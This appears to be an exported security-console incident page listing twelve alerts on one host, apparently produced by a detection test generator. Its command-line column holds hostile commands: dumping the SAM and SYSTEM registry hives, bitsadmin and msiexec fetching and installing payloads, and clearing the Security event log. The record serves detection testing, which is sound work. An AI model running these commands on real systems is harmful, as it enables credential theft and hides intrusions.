Back to list

Critical CINC-20251220-EFE5D63D new

Aggregate ID: aggind:024efd237c2d4f87958607652cb04c8b:8600649095

Incident Overview

Incident ID CINC-20251220-EFE5D63D

Severity Critical (90)

Status new

Alert Count 12

Host Count 1

Timeline

First Seen 2025-12-18 09:27:21

Last Seen 2025-12-18 09:41:52

Duration 0d 0h 14m

Created 2025-12-20 13:23

Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...

Observed Tactics:

Techniques:

Affected Hosts (1)

Related Alerts (12)

Severity	Status	Hostname	Description	Tactic	Command Line	Time
Critical	new	BOOK-R0BE6S1NC3	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv	12-18 09:41
High	new	BOOK-R0BE6S1NC3	A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree.	Defense Evasion	bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe	12-18 09:41
High	new	BOOK-R0BE6S1NC3	Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions.	Persistence	msiexec /q /i http://127.0.0.1/test.msi	12-18 09:38
High	new	BOOK-R0BE6S1NC3	A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree.	Defense Evasion	bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe	12-18 09:38
High	new	BOOK-R0BE6S1NC3	Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions.	Persistence	msiexec /q /i http://127.0.0.1/test.msi	12-18 09:34
Critical	new	BOOK-R0BE6S1NC3	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv	12-18 09:34
Critical	new	BOOK-R0BE6S1NC3	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv	12-18 09:34
High	new	BOOK-R0BE6S1NC3	A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree.	Defense Evasion	bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe	12-18 09:34
Critical	new	BOOK-R0BE6S1NC3	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv	12-18 09:30
Critical	new	BOOK-R0BE6S1NC3	A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.	Credential Access	reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv	12-18 09:30
High	new	BOOK-R0BE6S1NC3	A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree.	Defense Evasion	wevtutil cl Security	12-18 09:30
Informational	new	BOOK-R0BE6S1NC3	A process has written a known EICAR test file. Review the files written by the triggered process.	Execution	"C:\app\cortex-xdr-siem-test\xdr_tools\MegaGenerator\bin\publish\MegaGenerator.exe" --once --scenarios 15	12-18 09:27